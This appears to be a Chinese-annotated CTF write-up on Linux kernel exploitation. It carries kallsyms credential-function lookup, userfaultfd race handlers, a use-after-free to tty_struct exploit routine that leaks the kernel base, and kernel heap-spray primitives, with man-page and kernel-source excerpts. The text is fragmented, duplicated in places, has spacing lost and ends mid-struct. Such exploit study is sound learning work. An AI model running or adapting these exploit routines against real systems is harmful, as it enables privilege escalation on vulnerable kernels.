void get_function_address(){
FILE* sym_table = fopen("/tmp/kallsyms", "r"); // including all address of kernel functions,just like the user model running address.
if(sym_table == NULL){
printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
exit(1);
}
size_t addr = 0;
char type[0x10];
char func_name[0x50];
// when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end.
while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){
if(commit_creds && prepare_kernel_cred) // two addresses of key functions are all found, return directly.
return;
if(!strcmp(func_name, "commit_creds")){ // function "commit_creds" found
commit_creds = addr;
printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds);
}else if(!strcmp(func_name, "prepare_kernel_cred")){
prepare_kernel_cred = addr;
printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred);
}
}
}
voidget_function_address(){ FILE* sym_table = fopen("/tmp/kallsyms", "r"); // including all address of kernel functions,just like the user model running address. if(sym_table == NULL){ printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m"); exit(1); } size_t addr = 0; char type[0x10]; char func_name[0x50]; // when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end. while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){ if(commit_creds && prepare_kernel_cred) // two addresses of key functions are all found, return directly. return; if(!strcmp(func_name, "commit_creds")){ // function "commit_creds" found commit_creds = addr; printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds); }elseif(!strcmp(func_name, "prepare_kernel_cred")){ prepare_kernel_cred = addr; printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred); } } }
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};
#!/bin/sh # SPDX-License-Identifier: GPL-2.0-only # ---------------------------------------------------------------------- # extract-vmlinux - Extract uncompressed vmlinux from a kernel image # # Inspired from extract-ikconfig # (c) 2009,2010 Dick Streefland <[url=mailto:dick@streefland.net]dick@streefland.net[/url]> # # (c) 2011 Corentin Chary <[url=mailto:corentin.chary@gmail.com]corentin.chary@gmail.com[/url]> # # ----------------------------------------------------------------------
check_vmlinux() { # Use readelf to check if it's a valid ELF # TODO: find a better to way to check that it's really vmlinux # and not just an elf readelf -h $1 > /dev/null 2>&1 || return1
cat $1 exit 0 }
try_decompress() { # The obscure use of the "tr" filter is to work around older versions of # "grep" that report the byte offset of the line instead of the pattern.
# Try to find the header ($1) and decompress from here for pos in `tr "$1\n$2""\n$2=" < "$img" | grep -abo "^$2"` do pos=${pos%%:*} tail -c+$pos "$img" | $3 > $tmp 2> /dev/null check_vmlinux $tmp done }
# Check invocation: me=${0##*/} img=$1 if [ $# -ne 1 -o ! -s "$img" ] then echo "Usage: $me <kernel-image>" >&2 exit 2 fi
dawn@dawn-virtual-machine:~/KernelLearning/babydriver$
[*] '/home/dawn/KernelLearning/babydriver/extract/lib/modules/4.4.72/babydriver.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x0)
int closing; unsignedchar *write_buf; int write_cnt; /* If the tty has a pending do_SAK, queue it here - akpm */ structwork_structSAK_work;//这里存在一个函数指针,可以泄露基地址 structtty_port *port; } __randomize_layout;
structsk_buff { union { struct { /* These two members must be first. */ structsk_buff *next; structsk_buff *prev;
union { structnet_device *dev; /* Some protocols might use this space to store information, * while device pointer would be NULL. * UDP receive path is one user. */ unsignedlong dev_scratch; }; }; structrb_noderbnode;/* used in netem, ip4 defrag, and tcp stack */ structlist_headlist; };
/* These elements must be at the end, see alloc_skb() for details. */ sk_buff_data_t tail; sk_buff_data_t end; unsignedchar *head, *data; unsignedint truesize; refcount_t users;
#ifdef CONFIG_SKB_EXTENSIONS /* only useable after checking ->active_extensions != 0 */ structskb_ext *extensions; #endif };
/* Allocate a new skbuff. We do this ourselves so we can fill in a few * 'private' fields and also do memory statistics to find all the * [BEEP] leaks. * */
/** * __alloc_skb - allocate a network buffer * @size: size to allocate * @gfp_mask: allocation mask * @flags: If SKB_ALLOC_FCLONE is set, allocate from fclone cache * instead of head cache and allocate a cloned (child) skb. * If SKB_ALLOC_RX is set, __GFP_MEMALLOC will be used for * allocations in case the data is required for writeback * @node: numa node to allocate memory on * * Allocate a new &sk_buff. The returned buffer has no headroom and a * tail room of at least size bytes. The object has a reference count * of one. The return is the buffer. On a failure the return is %NULL. * * Buffers may only be allocated from interrupts using a @gfp_mask of * %GFP_ATOMIC. */ structsk_buff *__alloc_skb(unsignedintsize, gfp_tgfp_mask, intflags, intnode) { structkmem_cache *cache; structsk_buff *skb; u8 *data; bool pfmemalloc;
/* We do our best to align skb_shared_info on a separate cache * line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives * aligned memory blocks, unless SLUB/SLAB debug is enabled. * Both skb->head and skb_shared_info are cache line aligned. */ size = SKB_DATA_ALIGN(size); size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info)); data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc); ... }
char fake_servant_msg[704]; /* sk_buff need include a tail, so the size(1024 - 320) should be set for the buff */ int dev_fd; /* using by filesystem */
/* to run the exp on the specific core only */ voidbind_cpu(int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set); }
/* * save the process current context * */ size_t user_cs, user_ss,user_rflags,user_sp;
voidsaveStatus(){ __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m Status has been saved . \033[0m"); }
_fentry__(a1, a2); v5 = v2; if ( a2 == 0x6666 ) { printk("Your flag is at %px! But I don't think you know it's content\n", flag); return0LL; } elseif ( a2 == 0x1337 && !_chk_range_not_ok(v2, 16LL, *(__readgsqword(¤t_task) + 0x1358))// check1:检查传递结构体的范围是否小于0x7ffff... && !_chk_range_not_ok(*v5, *(v5 + 8), *(__readgsqword(¤t_task) + 0x1358))// check2:检查结构体内容的范围是否小于0x7ffff... && *(v5 + 8) == strlen(flag) ) // check3:检查长度是否等于flag { for ( i = 0; i < strlen(flag); ++i ) { if ( *(*v5 + i) != flag[i] ) return22LL; } printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag); return0LL; } else { return14LL; } }
Note: There is no glibc wrapper for this system call; see NOTES.
DESCRIPTION userfaultfd() creates a new userfaultfd object that can be used for delegation of page-fault handling to a user-space application, and returns a file descriptor that refers to the new object. The new userfaultfd ob‐ ject is configured using ioctl(2).
Once the userfaultfd object is configured, the application can use read(2) to receive userfaultfd notifications. The reads from userfaultfd may be blocking or non-blocking, depending on the value of flags used for the creation of the userfaultfd or subsequent calls to fcntl(2).
The following values may be bitwise ORed in flags to change the behavior of userfaultfd():
O_CLOEXEC Enable the close-on-exec flag for the new userfaultfd file descriptor. See the description of the O_CLOEXEC flag in open(2).
O_NONBLOCK Enables non-blocking operation for the userfaultfd object. See the description of the O_NONBLOCK flag in open(2).
When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.
Usage The userfaultfd mechanism is designed to allow a thread in a multithreaded program to perform user-space paging for the other threads in the process. When a page fault occurs for one of the regions registered to the userfaultfd object, the faulting thread is put to sleep and an event is generated that can be read via the userfaultfd file descriptor. The fault-handling thread reads events from this file descriptor and services them using the operations described in ioctl_userfaultfd(2). When servicing the page fault events, the fault-handling thread can trigger a wake-up for the sleeping thread.
It is possible for the faulting threads and the fault-handling threads to run in the context of different processes. In this case, these threads may belong to different programs, and the program that executes the faulting threads will not necessarily cooperate with the program that handles the page faults. In such non-cooperative mode, the process that monitors userfaultfd and handles page faults needs to be aware of the changes in the virtual memory layout of the faulting process to avoid memory corruption.
Starting from Linux 4.11, userfaultfd can also notify the fault-handling threads about changes in the virtual memory layout of the faulting process. In addition, if the faulting process invokes fork(2), the user‐ faultfd objects associated with the parent may be duplicated into the child process and the userfaultfd monitor will be notified (via the UFFD_EVENT_FORK described below) about the file descriptor associated with the userfault objects created for the child process, which allows the userfaultfd monitor to perform user-space paging for the child process. Unlike page faults which have to be synchronous and require an explicit or implicit wakeup, all other events are delivered asynchronously and the non-cooperative process resumes execution as soon as the userfaultfd manager executes read(2). The userfaultfd manager should carefully synchro‐ nize calls to UFFDIO_COPY with the processing of events.
// 注册时要用一个struct uffdio_register结构传递注册信息: // struct uffdio_range { // __u64 start; /* Start of range */ // __u64 len; /* Length of range (bytes) */ // }; // // struct uffdio_register { // struct uffdio_range range; // __u64 mode; /* Desired mode of operation (input) */ // __u64 ioctls; /* Available ioctl() operations (output) */ // };
/* Create a private anonymous mapping. The memory will be demand-zero paged--that is, not yet allocated. When we actually touch the memory, it will be allocated via the userfaultfd. */
fault_handler_thread(void *arg) { staticstructuffd_msgmsg;/* Data read from userfaultfd */ staticint fault_cnt = 0; /* Number of faults so far handled */ long uffd; /* userfaultfd file descriptor */ staticchar *page = NULL; structuffdio_copyuffdio_copy; ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
/* Copy the page pointed to by 'page' into the faulting region. Vary the contents that are copied in, so that it is more obvious that each fault is handled separately. */
Licensed under the GNU General Public License version 2 or later. */ #define _GNU_SOURCE #include<sys/types.h> #include<stdio.h> #include<linux/userfaultfd.h> #include<pthread.h> #include<errno.h> #include<unistd.h> #include<stdlib.h> #include<fcntl.h> #include<signal.h> #include<poll.h> #include<string.h> #include<sys/mman.h> #include<sys/syscall.h> #include<sys/ioctl.h>
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \ } while (0)
staticint page_size;
staticvoid * fault_handler_thread(void *arg) { staticstructuffd_msgmsg;/* Data read from userfaultfd */ staticint fault_cnt = 0; /* Number of faults so far handled */ long uffd; /* userfaultfd file descriptor */ staticchar *page = NULL; structuffdio_copyuffdio_copy; ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
/* Copy the page pointed to by 'page' into the faulting region. Vary the contents that are copied in, so that it is more obvious that each fault is handled separately. */
printf(" (uffdio_copy.copy returned %lld)\n", uffdio_copy.copy); } }
int main(int argc, char *argv[]) { long uffd; /* userfaultfd file descriptor */ char *addr; /* Start of region handled by userfaultfd */ unsignedlong len; /* Length of region handled by userfaultfd */ pthread_t thr; /* ID of thread that handles page faults */ structuffdio_apiuffdio_api; structuffdio_registeruffdio_register; int s;
/* Create a private anonymous mapping. The memory will be demand-zero paged--that is, not yet allocated. When we actually touch the memory, it will be allocated via the userfaultfd. */
printf("Address returned by mmap() = %p\n", addr);
/* Register the memory range of the mapping we just created for handling by the userfaultfd object. In mode, we request to track missing pages (i.e., pages that have not yet been faulted in). */
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd); if (s != 0) { errno = s; errExit("pthread_create"); }
/* Main thread now touches memory in the mapping, touching locations 1024 bytes apart. This will trigger userfaultfd events for all pages in the region. */
int l; l = 0xf; /* Ensure that faulting address is not on a page boundary, in order to test that we correctly handle that case in fault_handling_thread() */ while (l < len) { char c = addr[l]; printf("Read address %p in main(): ", addr + l); printf("%c\n", c); l += 1024; usleep(100000); /* Slow things down a little */ }
/* Create a thread that will process the userfaultfd events */ s = pthread_create(&thr, NULL, handler, (void *)uffd); if(s != 0){ errno = s; errExit("pthread_create"); } }
staticchar* page; /* the data you want to overwrite */
staticvoid* fault_handler_thread(void * arg){ staticstructuffd_msgmsg;/* data read from userfaultfd */ staticint fault_cnt = 0; /* Number of faults so far handled */ long uffd; /* userfaultfd file descriptor */
structuffdio_copyuffdio_copy; ssize_t nread;
uffd = (long)arg;
/* Loop, handling incoming events on the userfaultfd file descriptor */ for(;;){ /* See what poll() tells us about the userfaultfd */ structpollfdpollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); if(nready == -1) errExit("poll");
/* Read an event from the userfaultfd */ nread = read(uffd, &msg, sizeof(msg)); if(nread == 0){ printf("EOF on userfaultfd!\n"); exit(EXIT_FAILURE); } if(nread == -1) errExit("read");
/* We expect only one king of evenr; verify that assuption */ if(msg.event != UFFD_EVENT_PAGEFAULT){ fprintf(strerr, "Unexpected event on userfaultfd\n"); exit(EXIT_FAILURE); }
/* copy things to the addr */
uffdio_copy.src = (unsignedlong) page; /* We need to handle page faults in units of pages(!). * So, round faulting address down to page boundary */ uffdio_copy.dst = (unsignedlong)msg.arg.pagefault.address & ~(page_size - 1);
(_fentry__)(idx, size, buf); if ( idx > 0xF ) //idx最大0xF { ret_value = -1LL; printk("[x] Add idx out of range.\n"); } else { content_1 = content_0; note_addr = ¬ebook[idx]; //notebook为bss段上的值,这里是取相应idx对应的地址 raw_read_lock(&lock); orig_size = note_addr->size; //取本来地址块的size位,用来进行可能的还原 note_addr->size = size; //填入我们传入的size if ( size > 0x60 ) //如果说size大于0x60,则进行还原size { note_addr->size = orig_size; ret_value = -2LL; printk("[x] Add size out of range.\n"); } else { copy_from_user(name, content_1, 256LL); //该name也是一个bss上的值,此时将我们的传递的notearg.buf传递给他 if ( note_addr->note ) //若本身存在note,依然还原size { note_addr->size = orig_size; ret_value = -3LL; printk("[x] Add idx is not empty.\n"); } else { note_addr->note = _kmalloc(size, 0x24000C0LL); //内核分配块 printk("[+] Add success. %s left a note.\n", name); ret_value = 0LL; } } raw_read_unlock(&lock); } return ret_value; }
notegift
该法会将notebook的内容传递给我们的userarg.buf,出题人很温柔:hibiscus:
1 2 3 4 5 6 7 8
__int64 __fastcall notegift(void *buf) { _fentry__(buf); printk("[*] The notebook needs to be written from beginning to end.\n"); copy_to_user(buf, notebook, 256LL); //传递内核地址给用户奥,太棒了 printk("[*] For this special year, I give you a gift!\n"); return100LL; }
staticvoid* fault_handler_thread(void * arg){ staticstructuffd_msgmsg;/* data read from userfaultfd */ staticint fault_cnt = 0; /* Number of faults so far handled */ long uffd; /* userfaultfd file descriptor */
structuffdio_copyuffdio_copy; ssize_t nread;
uffd = (long)arg;
/* Loop, handling incoming events on the userfaultfd file descriptor */ for(;;){ /* See what poll() tells us about the userfaultfd */ structpollfdpollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); if(nready == -1) errExit("poll");
/* Read an event from the userfaultfd */ info_log("catch the user page fault!"); nread = read(uffd, &msg, sizeof(msg));
/* We expect only one king of evenr; verify that assuption */ if(msg.event != UFFD_EVENT_PAGEFAULT){ fprintf(stderr, "Unexpected event on userfaultfd\n"); exit(EXIT_FAILURE); }
/* copy things to the addr */
uffdio_copy.src = (unsignedlong) page; /* We need to handle page faults in units of pages(!). * So, round faulting address down to page boundary */ uffdio_copy.dst = (unsignedlong)msg.arg.pagefault.address & ~(page_size - 1);
/* construct a monitored zone */ char* user_mmap = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); userfaultfd_attack(user_mmap, 0x1000, fault_handler_thread);
/*init the semaphore, and the value firstly be given a zero*/ sem_init(&evil_add_sem, 0, 0); sem_init(&evil_edit_sem, 0, 0); pthread_t thread_1, thread_2;
sem_post(&evil_edit_sem); //we could run the thread_edit to get a UAF sleep(1);
sem_post(&evil_add_sem); //use that to modify the size for 0 to not 0 sleep(1); /* now we get a UAF chunk(0x2e0) with no zero size, so we can get the tty_struct*/ info_log("try to get the tty_struct"); tty_fd = open("/dev/ptmx", 2); if(tty_fd <=0){ error_log("ptmx open failed"); } read(note_fd, orig_tty_struct, 0); if(*(int*)orig_tty_struct != 0x5401){ //mey be failed error_log("pity,get a wrong tty!"); } info_log("get right tty_struct!congratulation!");
/* get the kernel base offset */ vmlinux_offset = ((orig_tty_struct[3]&0xfff) == 0x440) ? (orig_tty_struct[3] - PTM_UNIX98_OPS): (orig_tty_struct[3] - PTY_UNIX98_OPS); PRINT_ADDR("vmlinux_offset", vmlinux_offset);
In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray.[1] In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’s heap and fill the bytes in these blocks with the right values.
/* For direct call via syscall(2): */ #include <asm/unistd.h> #include <linux/keyctl.h> #include <unistd.h>
long syscall(__NR_keyctl, int operation, __kernel_ulong_t arg2, __kernel_ulong_t arg3, __kernel_ulong_t arg4, __kernel_ulong_t arg5);
No glibc wrapper is provided forthis system call; see NOTES.
DESCRIPTION keyctl() allows user-space programs to perform key manipulation. //允许用户进行密钥操作
The operation performed by keyctl() is determined by the value of the operation argument. Each of these operations is wrapped by the libkeyutils library (provided by the keyutils package) into individual functions (noted below) to permit the compiler to check types.
NOTES No wrapper forthis system call is provided in glibc. A wrapper is provided in the libkeyutils library. When employing the wrapper in that library, link with -lkeyutils. However, rather than using this system call directly, you probably want to use the various library functions mentioned in the descriptions of individual operations above.
No glibc wrapper is provided for this system call; see NOTES.
DESCRIPTION add_key() creates or updates a keyof the given type and description, instantiates it with the payload of length plen, attaches it to the nominated keyring, and returns the key's serial number.
The key may be rejected if the provided data isin the wrong format or it is invalid in some other way.
If the destination keyring already contains a key that matches the specified type and description, then, if the key type supports it, that key will be updated rather than a newkey being created; ifnot, a newkey (with a different ID) will be created and it will displace the link to the extant keyfrom the keyring.
The destination keyring serial number may be that of a valid keyring for which the caller has write permission. Alternatively, it may be one of the following special keyring IDs:
KEY_SPEC_THREAD_KEYRING This specifies the caller's thread-specific keyring (thread-keyring(7)).
KEY_SPEC_PROCESS_KEYRING This specifies the caller's process-specific keyring (process-keyring(7)).
KEY_SPEC_SESSION_KEYRING This specifies the caller's session-specific keyring (session-keyring(7)).
KEY_SPEC_USER_KEYRING This specifies the caller's UID-specific keyring (user-keyring(7)).
KEY_SPEC_USER_SESSION_KEYRING This specifies the caller's UID-session keyring (user-session-keyring(7)).
Keyrings are special keys thatcontain a listof other keys. Keyring lists can be modified using various system calls. Keyrings should not be given a payload when created.
(+) "user"
A key of this type has a description and a payload that are arbitrary blobs of data. These can be created, updated andreadby userspace, and aren't intended for use by kernel services.
(+) "logon"
Like a "user" key, a "logon" key has a payload thatis an arbitrary blob of data. It is intended as a place to store secrets which are accessible tothe kernel butnotto userspace programs.
The description can be arbitrary, but must be prefixed with a non-zero lengthstringthat describes the key "subclass". The subclass is separated fromtherestofthe description by a ':'. "logon" keys can be created and updated from userspace, butthe payload is only readable from kernel space.
/* * Extract the description of a new key from userspace and either add it as a * new key to the specified keyring or update a matching key in that keyring. * * If the description is NULL or an empty string, the key type is asked to * generate one from the payload. * * The keyring must be writable so that we can attach the key to it. * * If successful, the new key's serial number is returned, otherwise an error * code is returned. */ SYSCALL_DEFINE5(add_key, constchar __user *, _type, constchar __user *, _description, constvoid __user *, _payload, size_t, plen, key_serial_t, ringid) { key_ref_t keyring_ref, key_ref; char type[32], *description; void *payload; long ret;
ret = -EINVAL; if (plen > 1024 * 1024 - 1) goto error;
/* draw all the data into kernel space */ ret = key_get_type_from_user(type, _type, sizeof(type)); //类型拷贝 if (ret < 0) goto error;
description = NULL; if (_description) { description = strndup_user(_description, KEY_MAX_DESC_SIZE); if (IS_ERR(description)) { ret = PTR_ERR(description); goto error; } if (!*description) { kfree(description); description = NULL; } elseif ((description[0] == '.') && (strncmp(type, "keyring", 7) == 0)) { ret = -EPERM; goto error2; } }
/* pull the payload in if one was supplied */ payload = NULL;
if (plen) { ret = -ENOMEM; payload = kvmalloc(plen, GFP_KERNEL); if (!payload) goto error2;
ret = -EFAULT; if (copy_from_user(payload, _payload, plen) != 0) goto error3; }
/* find the target keyring (which must be writable) */ keyring_ref = lookup_user_key(ringid, KEY_LOOKUP_CREATE, KEY_NEED_WRITE); if (IS_ERR(keyring_ref)) { ret = PTR_ERR(keyring_ref); goto error3; }
/* create or update the requested key and add it to the target * keyring */ key_ref = key_create_or_update(keyring_ref, type, description, payload, plen, KEY_PERM_UNDEF, KEY_ALLOC_IN_QUOTA); if (!IS_ERR(key_ref)) { ret = key_ref_to_ptr(key_ref)->serial; key_ref_put(key_ref); } else { ret = PTR_ERR(key_ref); }
/* create or update the requested key and add it to the target * keyring */ key_ref = key_create_or_update(keyring_ref, type, description, payload, plen, KEY_PERM_UNDEF, KEY_ALLOC_IN_QUOTA);
/* * Initialise the key management state. */ void __init key_init(void) { /* allocate a slab in which we can store keys */ key_jar = kmem_cache_create("key_jar", sizeof(struct key), 0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
/* add the special key types */ list_add_tail(&key_type_keyring.link, &key_types_list); list_add_tail(&key_type_dead.link, &key_types_list); list_add_tail(&key_type_user.link, &key_types_list); list_add_tail(&key_type_logon.link, &key_types_list);
/* record the root user tracking */ rb_link_node(&root_key_user.node, NULL, &key_user_tree.rb_node);
/* * user defined keys take an arbitrary string as the description and an * arbitrary blob of data as the payload */ struct key_type key_type_user = { .name = "user", .preparse = user_preparse, .free_preparse = user_free_preparse, .instantiate = generic_key_instantiate, .update = user_update, .revoke = user_revoke, .destroy = user_destroy, .describe = user_describe, .read = user_read, };
/*****************************************************************************/ /* * the payload for a key of type "user" or "logon" * - once filled in and attached to a key: * - the payload struct is invariant may not be changed, only replaced * - the payload must be read with RCU procedures or with the key semaphore * held * - the payload may only be replaced with the key semaphore write-locked * - the key's data length is the size of the actual data, not including the * payload wrapper */ struct user_key_payload { struct rcu_head rcu; /* RCU destructor */ unsigned short datalen; /* length of this data */ char data[] __aligned(__alignof__(u64)); /* actual data */ };
/* * Update a key's data payload from the given data. * * The key must grant the caller Write permission and the key type must support * updating for this to work. A negative key can be positively instantiated * with this call. * * If successful, 0 will be returned. If the key type does not support * updating, then -EOPNOTSUPP will be returned. */ longkeyctl_update_key(key_serial_t id, constvoid __user *_payload, size_t plen) { key_ref_t key_ref; void *payload; long ret;
ret = -EINVAL; if (plen > PAGE_SIZE) goto error;
/* pull the payload in if one was supplied */ payload = NULL; if (plen) { ret = -ENOMEM; payload = kvmalloc(plen, GFP_KERNEL); //分配临时payload if (!payload) goto error;
ret = -EFAULT; if (copy_from_user(payload, _payload, plen) != 0) goto error2; }
...
/* update the key */ ret = key_update(key_ref, payload, plen);
/** * key_update - Update a key's contents. * @key_ref: The pointer (plus possession flag) to the key. * @payload: The data to be used to update the key. * @plen: The length of @payload. * * Attempt to update the contents of a key with the given payload data. The * caller must be granted Write permission on the key. Negative keys can be * instantiated by this method. * * Returns 0 on success, -EACCES if not permitted and -EOPNOTSUPP if the key * type does not support updating. The key type may return other errors. */ intkey_update(key_ref_t key_ref, constvoid *payload, size_t plen) { structkey_preparsed_payloadprep; structkey *key = key_ref_to_ptr(key_ref); int ret;
key_check(key);
/* 该key必须可写 */ ret = key_permission(key_ref, KEY_NEED_WRITE); if (ret < 0) return ret;
/* 尝试更新 */ if (!key->type->update) return -EOPNOTSUPP;
memset(&prep, 0, sizeof(prep)); prep.data = payload; prep.datalen = plen; prep.quotalen = key->type->def_datalen; prep.expiry = TIME64_MAX; if (key->type->preparse) { ret = key->type->preparse(&prep); //类似前面user_key_payload分配,也就是在prep的payload字段附上我们新的user_key_payload if (ret < 0) goto error; }
/* * update a user defined key * - the key's semaphore is write-locked */ intuser_update(struct key *key, struct key_preparsed_payload *prep) { struct user_key_payload *zap = NULL; int ret;
/* check the quota and attach the new data */ ret = key_payload_reserve(key, prep->datalen); if (ret < 0) return ret;
/* attach the new data, displacing the old */ key->expiry = prep->expiry; if (key_is_positive(key)) zap = dereference_key_locked(key); rcu_assign_keypointer(key, prep->payload.data[0]); prep->payload.data[0] = NULL;
if (zap) call_rcu(&zap->rcu, user_free_payload_rcu); return ret; }
#define rcu_assign_keypointer(KEY, PAYLOAD) \ do { \ rcu_assign_pointer((KEY)->payload.rcu_data0, (PAYLOAD)); \ } while (0)
#define rcu_assign_pointer(p, v) do { (p) = (v); } while (0)
/* * Revoke a key. * * The key must be grant the caller Write or Setattr permission for this to * work. The key type should give up its quota claim when revoked. The key * and any links to the key will be automatically garbage collected after a * certain amount of time (/proc/sys/kernel/keys/gc_delay). * * Keys with KEY_FLAG_KEEP set should not be revoked. * * If successful, 0 is returned. */ longkeyctl_revoke_key(key_serial_t id) { ... if (test_bit(KEY_FLAG_KEEP, &key->flags)) ret = -EPERM; else key_revoke(key);
/** * key_revoke - Revoke a key. * @key: The key to be revoked. * * Mark a key as being revoked and ask the type to free up its resources. The * revocation timeout is set and the key and all its links will be * automatically garbage collected after key_gc_delay amount of time if they * are not manually dealt with first. */ voidkey_revoke(struct key *key) {
... down_write_nested(&key->sem, 1); if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags)) { notify_key(key, NOTIFY_KEY_REVOKED, 0); if (key->type->revoke) key->type->revoke(key);
... }
函数会调用key->type->revoke(&key),其对应函数user_revoke
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
/* * dispose of the links from a revoked keyring * - called with the key sem write-locked */ void user_revoke(structkey*key) { struct user_key_payload *upayload = user_key_payload_locked(key);
/* clear the quota */ key_payload_reserve(key, 0);
/* * Read a key's payload. * * The key must either grant the caller Read permission, or it must grant the * caller Search permission when searched for from the process keyrings. * * If successful, we place up to buflen bytes of data into the buffer, if one * is provided, and return the amount of data that is available in the key, * irrespective of how much we copied into the buffer. */ longkeyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen) { structkey *key; key_ref_t key_ref; long ret; char *key_data = NULL; size_t key_data_len;
...
key_data_len = (buflen <= PAGE_SIZE) ? buflen : 0; for (;;) { if (key_data_len) { key_data = kvmalloc(key_data_len, GFP_KERNEL); //分配一个key_data_len的堆块 if (!key_data) { ret = -ENOMEM; goto key_put_out; } }
ret = __keyctl_read_key(key, key_data, key_data_len); //调用user_read函数,他会将我们原来的payload内容复制到key_data里面
/* * Read methods will just return the required length without * any copying if the provided length isn't large enough. */ if (ret <= 0 || ret > buflen) break;
/* * The key may change (unlikely) in between 2 consecutive * __keyctl_read_key() calls. In this case, we reallocate * a larger buffer and redo the key read when * key_data_len < ret <= buflen. */ if (ret > key_data_len) { if (unlikely(key_data)) kvfree_sensitive(key_data, key_data_len); key_data_len = ret; continue; /* Allocate buffer */ }
if (copy_to_user(buffer, key_data, ret)) ret = -EFAULT; break; } kvfree_sensitive(key_data, key_data_len);
/* * Unlink a key from a keyring. * * The keyring must grant the caller Write permission for this to work; the key * itself need not grant the caller anything. If the last link to a key is * removed then that key will be scheduled for destruction. * * Keys or keyrings with KEY_FLAG_KEEP set should not be unlinked. * * If successful, 0 will be returned. */ longkeyctl_keyring_unlink(key_serial_t id, key_serial_t ringid) { key_ref_t keyring_ref, key_ref; structkey *keyring, *key; long ret;
keyring_ref = lookup_user_key(ringid, 0, KEY_NEED_WRITE); if (IS_ERR(keyring_ref)) { ret = PTR_ERR(keyring_ref); goto error; }
key_ref = lookup_user_key(id, KEY_LOOKUP_PARTIAL, KEY_NEED_UNLINK); if (IS_ERR(key_ref)) { ret = PTR_ERR(key_ref); goto error2; }
keyring = key_ref_to_ptr(keyring_ref); key = key_ref_to_ptr(key_ref); if (test_bit(KEY_FLAG_KEEP, &keyring->flags) && test_bit(KEY_FLAG_KEEP, &key->flags)) ret = -EPERM; else ret = key_unlink(keyring, key);
DESCRIPTION pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe. pipefd[0] refers to the read end of the pipe. pipefd[1] refers to the write end of the pipe. Data written to the write end of the pipe is buffered by the kernel until it is read from the read end of the pipe. For further details, see pipe(7).
If flags is 0, then pipe2() is the same as pipe(). The following values can be bitwise ORed in flags to obtain different behavior:
/* * sys_pipe() is the normal C calling standard for creating * a pipe. It's not the way Unix traditionally does this, though. */ staticintdo_pipe2(int __user *fildes, int flags) { structfile *files[2]; int fd[2]; int error;
/** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @poll_usage: is this pipe used for epoll, which has crazy wakeups? * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ structpipe_inode_info { structmutexmutex; wait_queue_head_t rd_wait, wr_wait; unsignedint head; unsignedint tail; unsignedint max_usage; unsignedint ring_size; #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif unsignedint nr_accounted; unsignedint readers; 